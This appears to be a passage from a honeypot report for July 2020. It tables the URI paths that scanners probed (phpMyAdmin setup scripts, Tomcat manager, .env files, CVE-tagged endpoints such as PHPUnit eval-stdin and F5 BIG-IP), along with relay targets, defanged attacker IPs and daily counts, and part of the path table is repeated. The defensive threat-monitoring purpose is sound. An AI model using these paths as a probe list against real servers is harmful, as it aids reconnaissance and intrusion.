| /db/dbadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/dbweb/scripts/setup[.]php | Database | - | 1 件 |
| /db/myadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/webdb/scripts/setup[.]php | Database | - | 1 件 |
| /db/websql/scripts/setup[.]php | SQL | - | 1 件 |
| /mysql-admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/db/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /mysql/sqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/web/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /p/m/a/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-my-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-myadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpLDAPadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmi/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /hpMyAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmin-2009-1/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-2/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[ .]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]9[.]5/scripts/setup [.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0[.]0/scripts/setup [.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0/scripts/setup[.]p hp |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]1-all-languages/scr ipts/setup[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11[.]3/scripts/setu p[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11/scripts/setup[.] php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]5[.]5/scripts/setup[.]ph p |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAds/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmy-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin4/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin5/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin6/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin7/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phppgadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phppma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2006/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2007/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2008/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2009/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2010/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /program/scripts/setup[.]php | PHPMyAdmin | - | 1 件 |
| /shopdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/php-myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin2/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmanager/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmy-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqladmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /sql/webadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/webdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/websql/scripts/setup[.]php | - | - | 1 件 |
| /sqlmanager/scripts/setup[.]php | - | - | 1 件 |
| /sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /web/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /web/scripts/setup[.]php | web page | - | 1 件 |
| /webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /webdb/scripts/setup[.]php | Database | - | 1 件 |
| /websql/scripts/setup[.]php | SQL | - | 1 件 |
| /xampp/phpmyadmin/scripts/setup[.]php | Unknown | - | 1 件 |
| /~/phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pHpMyAdMiN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /tmpfs/auto[.]jpg | - | - | 1 件 |
| /wp-content/plugins/angwp/package[.]json | WordPress | - | 1 件 |
| /manager/text/list | Apache Tomcat Manager | - | 1 件 |
| /stalker_portal/c/version[.]js | - | - | 1 件 |
| /client_area/ | Unknown | Unknown | 1 件 |
| /system_api[.]php | - | - | 1 件 |
| /stalker_portal/c/ | - | - | 1 件 |
| /api[.]php | api | - | 1 件 |
| /login[.]php | Login Page | - | 1 件 |
| /streaming | - | - | 1 件 |
| /streaming/er678pkf[.]php | - | - | 1 件 |
| /cdn-cgi/trace | Cloudflare | - | 1 件 |
| /// | - | - | 1 件 |
| ///wp-json/wp/v2/users/ | - | - | 1 件 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 件 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]p hp |
- | - | 1 件 |
| /nmaplowercheck1594687755 | Nmap | - | 1 件 |
| /NmapUpperCheck1594687755 | Nmap | - | 1 件 |
| /Nmap/folder/check1594687755 | Nmap | - | 1 件 |
| /HNAP1 | D-Link Router | CVE-2017-3193 | 1 件 |
| /evox/about | Nmap | - | 1 件 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 1 件 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 1 件 |
| /TP/public/index[.]php | - | - | 1 件 |
| /nmaplowercheck1594884888 | Nmap | - | 1 件 |
| /NmapUpperCheck1594884888 | Nmap | - | 1 件 |
| /solr/ | - | - | 1 件 |
| /ReportServer | SQL Server Reporting Services | CVE-2020-0618 | 1 件 |
| /adv,/cgi-bin/weblogin[.]cgi | Zyxel NAS | CVE-2020-9054 | 1 件 |
| '/xui/common/images/bg_status[.]php' | F5 Networks BIG-IP | CVE-2020-5902 | 1 件 |
| /nice ports,/Trinity[.]txt[.]bak | - | - | 1 件 |
| md5calc[.]com:443 | Unauthorized Relay | - | 1 件 |
| ifconfig[.]me:443 | Unauthorized Relay | - | 1 件 |
| www[.]showmyip[.]com:443 | Unauthorized Relay | - | 1 件 |
| /wordpress | WordPress | - | 1 件 |
| /wordpress/wp-json/wp/v2/users | WordPress | - | 1 件 |
| /wordpress/ | WordPress | - | 1 件 |
| /user/UserLogin | WP Marketplace 2.4.0 | CVE-2014-9013 CVE-2014-9014 | 1 件 |
| chekfast[.]zennolab[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxps://chek[.]zennolab[.]com/proxy[.]ph p |
Unauthorized Relay | - | 1 件 |
| v4[.]ipv6-test[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]p hp |
- | - | 1 件 |
WOWHoneypot(HTTPS)(Total)
Number of detections
| Date | Detections |
|---|---|
| 20200711 | 21 |
| 20200712 | 7 |
| 20200713 | 18 |
| 20200714 | 8 |
| 20200715 | 15 |
| 20200716 | 17 |
| 20200717 | 21 |
| 20200718 | 19 |
| 20200719 | 25 |
| 20200720 | 17 |
RemoteIP(TOP20)
| IP | Country | Count | AbuseIPDB |
|---|---|---|---|
| 31[.]193[.]21[.]39 | Italy | 2001 件 | Link |
| 185[.]128[.]41[.]50 | Switzerland | 514 件 | Link |
| 185[.]216[.]140[.]239 | Netherlands | 172 件 | Link |
| 195[.]54[.]160[.]21 | Russia | 44 件 | Link |
| 107[.]167[.]7[.]226 | United States | 42 件 | Link |
| 103[.]75[.]189[.]81 | Malaysia | 20 件 | Link |
| 195[.]54[.]160[.]135 | Russia | 19 件 | Link |
| 143[.]92[.]32[.]86 | Cambodia | 16 件 | Link |
| 80[.]82[.]70[.]140 | Seychelles | 12 件 | Link |
| 143[.]92[.]32[.]106 | Cambodia | 12 件 | Link |
| 35[.]200[.]47[.]165 | Unknown | 12 件 | Link |
| 93[.]174[.]93[.]139 | Netherlands | 11 件 | Link |
| 167[.]99[.]164[.]22 | United States | 11 件 | Link |
| 45[.]199[.]113[.]16 | United States | 10 件 | Link |
| 185[.]100[.]87[.]248 | Romania | 10 件 | Link |
| 65[.]74[.]177[.]84 | United States | 9 件 | Link |
| 93[.]113[.]111[.]100 | United Kingdom | 9 件 | Link |
| 62[.]210[.]185[.]4 | France | 9 件 | Link |
| 46[.]101[.]31[.]59 | United Kingdom | 9 件 | Link |
| 104[.]199[.]101[.]230 | United States | 9 件 | Link |
URI PATH
| URI Path | Target | CVE | Count |
|---|---|---|---|
| /manager/html | Apache Tomcat Manager | - | 2516 件 |
| /wp-login[.]php | WordPress | - | 588 件 |
| / | - | - | 420 件 |
| /xmlrpc[.]php | Wordpress | - | 294 件 |
| github[.]com:443 | Unauthorized Relay | - | 30 件 |
| /phpMyAdmin/scripts/setup[.]php | phpMyAdmin | - | 24 件 |
| hxxpbin[.]org:443 | Unauthorized Relay | - | 14 件 |
| /solr/admin/info/system | - | - | 11 件 |
| /index[.]php | - | - | 11 件 |
| /vendor/phpunit/phpunit/src/Util/PHP/eva l-stdin[.]php |
PHPUnit | CVE-2017-9841 | 10 件 |
| /hudson | Unknown | - | 9 件 |
| /api/jsonws/invoke | api | - | 9 件 |
| /cgi-bin/mainfunction[.]cgi | CGI | - | 8 件 |
| /[.]env | Hidden files | - | 8 件 |
| /portal/redlion | Unknown | Unknown | 8 件 |
| /config/getuser | - | - | 8 件 |
| sm[.]bdimg[.]com:443 | Unauthorized Relay | - | 7 件 |
| /boaform/admin/formLogin | Administrator | - | 6 件 |
| g[.]alicdn[.]com:443 | Unauthorized Relay | - | 6 件 |
| /favicon[.]ico | favicon | - | 5 件 |
| /admin/login[.]asp | Administrator | - | 3 件 |
| /webfig/ | MikroTik RouterOS | - | 3 件 |
| /phpmyadmin/ | phpMyAdmin | - | 3 件 |
| /myadmin/scripts/setup[.]php | Administrator | - | 3 件 |
| /phpmy/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /pma/scripts/setup[.]php | phpMyAdmin | - | 3 件 |
| /shell | - | - | 3 件 |
| /robots[.]txt | robots.txt | - | 3 件 |
| /cgi-bin/kerbynet | CGI | - | 3 件 |
| /ipc$ | shared folder | - | 2 件 |
| /database/scripts/setup[.]php | Database | - | 2 件 |
| /db/scripts/setup[.]php | Database | - | 2 件 |
| /dbadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /my/scripts/setup[.]php | PHPMyAdmin | - | 2 件 |
| /mysql/scripts/setup[.]php | MySQL | - | 2 件 |
| /mysqladmin/scripts/setup[.]php | MySQL | - | 2 件 |
| /phpMyAdmin-2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpadmin/scripts/setup[.]php | Administrator | - | 2 件 |
| /phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin1/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /phpmyadmin2/scripts/setup[.]php | phpMyAdmin | - | 2 件 |
| /scripts/setup[.]php | - | - | 2 件 |
| /sqladm/scripts/setup[.]php | - | - | 2 件 |
| /sqladmin/scripts/setup[.]php | - | - | 2 件 |
| /MyAdmin/scripts/setup[.]php | Administrator | - | 2 件 |
| hxxp://example[.]com/ | Unauthorized relay | - | 2 件 |
| /streaming/clients_live[.]php | - | - | 2 件 |
| /sdk | - | - | 2 件 |
| /[.]remote | Hidden files | - | 2 件 |
| /[.]local | Hidden files | - | 2 件 |
| /[.]production | Hidden files | - | 2 件 |
| //vendor/[.]env | - | - | 2 件 |
| //lib/[.]env | - | - | 2 件 |
| //lab/[.]env | - | - | 2 件 |
| //cronlab/[.]env | - | - | 2 件 |
| //cron/[.]env | - | - | 2 件 |
| //core/[.]env | - | - | 2 件 |
| //core/app/[.]env | - | - | 2 件 |
| //core/Datavase/[.]env | - | - | 2 件 |
| //database/[.]env | - | - | 2 件 |
| //config/[.]env | - | - | 2 件 |
| //assets/[.]env | - | - | 2 件 |
| //app/[.]env | - | - | 2 件 |
| //apps/[.]env | - | - | 2 件 |
| //uploads/[.]env | - | - | 2 件 |
| //sitemaps/[.]env | - | - | 2 件 |
| //saas/[.]env | - | - | 2 件 |
| /wp-content/plugins/t_file_wp/t_file_wp[ .]php |
WordPress | - | 2 件 |
| /wordpress/wp-login[.]php | WordPress | - | 2 件 |
| 5[.]132[.]162[.]27:443 | Unauthorized Relay | - | 2 件 |
| hxxp://163[.]172[.]88[.]110:41298/pass | Unauthorized relay | - | 2 件 |
| /sitemap[.]xml | - | - | 2 件 |
| /[.]well-known/security[.]txt | Hidden files | - | 2 件 |
| /boaform/admin/formPing | Administrator | - | 1 件 |
| ext[.]baidu[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized relay | - | 1 件 |
| /w00tw00t[.]at[.]blackhats[.]romanian[.] anti-sec:) |
ZmEu | - | 1 件 |
| /2phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PMA2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /SQL/scripts/setup[.]php | - | - | 1 件 |
| /_PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/mysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /admin/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/phpMyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/setup[.]php | Administrator | - | 1 件 |
| /admin/sql/scripts/setup[.]php | SQL | - | 1 件 |
| /admin/sqladmin/scripts/setup[.]php | SQLAdmin | - | 1 件 |
| /admin/sysadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/admin/scripts/setup[.]ph p |
Administrator | - | 1 件 |
| /administrator1/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator1/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /blog/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /cpadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpadmindb/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpanelmysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /cpanelphpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/db-admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/dbadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/dbweb/scripts/setup[.]php | Database | - | 1 件 |
| /db/myadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/webdb/scripts/setup[.]php | Database | - | 1 件 |
| /db/websql/scripts/setup[.]php | SQL | - | 1 件 |
| /mysql-admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/db/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /mysql/sqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/web/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /p/m/a/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-my-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-myadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpLDAPadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmi/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /hpMyAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmin-2009-1/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-2/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[ .]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]9[.]5/scripts/setup [.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0[.]0/scripts/setup [.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0/scripts/setup[.]p hp |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]1-all-languages/scr ipts/setup[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11[.]3/scripts/setu p[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11/scripts/setup[.] php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]5[.]5/scripts/setup[.]ph p |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/ scripts/setup[.]php |
phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAds/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmy-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin4/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin5/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin6/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin7/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phppgadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phppma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2006/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2007/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2008/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2009/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2010/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /program/scripts/setup[.]php | PHPMyAdmin | - | 1 件 |
| /shopdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/php-myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin2/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmanager/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmy-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqladmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /sql/webadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/webdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/websql/scripts/setup[.]php | - | - | 1 件 |
| /sqlmanager/scripts/setup[.]php | - | - | 1 件 |
| /sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /web/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /web/scripts/setup[.]php | web page | - | 1 件 |
| /webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /webdb/scripts/setup[.]php | Database | - | 1 件 |
| /websql/scripts/setup[.]php | SQL | - | 1 件 |
| /xampp/phpmyadmin/scripts/setup[.]php | Unknown | - | 1 件 |
| /~/phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pHpMyAdMiN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /tmpfs/auto[.]jpg | - | - | 1 件 |
| /wp-content/plugins/angwp/package[.]json | WordPress | - | 1 件 |
| /manager/text/list | Apache Tomcat Manager | - | 1 件 |
| /stalker_portal/c/version[.]js | - | - | 1 件 |
| /client_area/ | Unknown | Unknown | 1 件 |
| /system_api[.]php | - | - | 1 件 |
| /stalker_portal/c/ | - | - | 1 件 |
| /api[.]php | api | - | 1 件 |
| /login[.]php | Login Page | - | 1 件 |
| /streaming | - | - | 1 件 |
| /streaming/er678pkf[.]php | - | - | 1 件 |
| /cdn-cgi/trace | Cloudflare | - | 1 件 |
| /// | - | - | 1 件 |
| ///wp-json/wp/v2/users/ | - | - | 1 件 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 件 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]p hp |
- | - | 1 件 |
| /nmaplowercheck1594687755 | Nmap | - | 1 件 |
| /NmapUpperCheck1594687755 | Nmap | - | 1 件 |
| /Nmap/folder/check1594687755 | Nmap | - | 1 件 |
| /HNAP1 | D-Link Router | CVE-2017-3193 | 1 件 |
| /evox/about | Nmap | - | 1 件 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 1 件 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 1 件 |
| /TP/public/index[.]php | - | - | 1 件 |
| /nmaplowercheck1594884888 | Nmap | - | 1 件 |
| /NmapUpperCheck1594884888 | Nmap | - | 1 件 |
| /solr/ | - | - | 1 件 |
| /ReportServer | SQL Server Reporting Services | CVE-2020-0618 | 1 件 |
| /adv,/cgi-bin/weblogin[.]cgi | Zyxel NAS | CVE-2020-9054 | 1 件 |
| '/xui/common/images/bg_status[.]php' | F5 Networks BIG-IP | CVE-2020-5902 | 1 件 |
| /nice ports,/Trinity[.]txt[.]bak | - | - | 1 件 |
| md5calc[.]com:443 | Unauthorized Relay | - | 1 件 |
| ifconfig[.]me:443 | Unauthorized Relay | - | 1 件 |
| www[.]showmyip[.]com:443 | Unauthorized Relay | - | 1 件 |
| /wordpress | WordPress | - | 1 件 |
| /wordpress/wp-json/wp/v2/users | WordPress | - | 1 件 |
| /wordpress/ | WordPress | - | 1 件 |
| /user/UserLogin | WP Marketplace 2.4.0 | CVE-2014-9013 CVE-2014-9014 | 1 件 |
| chekfast[.]zennolab[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxps://chek[.]zennolab[.]com/proxy[.]ph p |
Unauthorized Relay | - | 1 件 |
| v4[.]ipv6-test[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]p hp |
- | - | 1 件 |
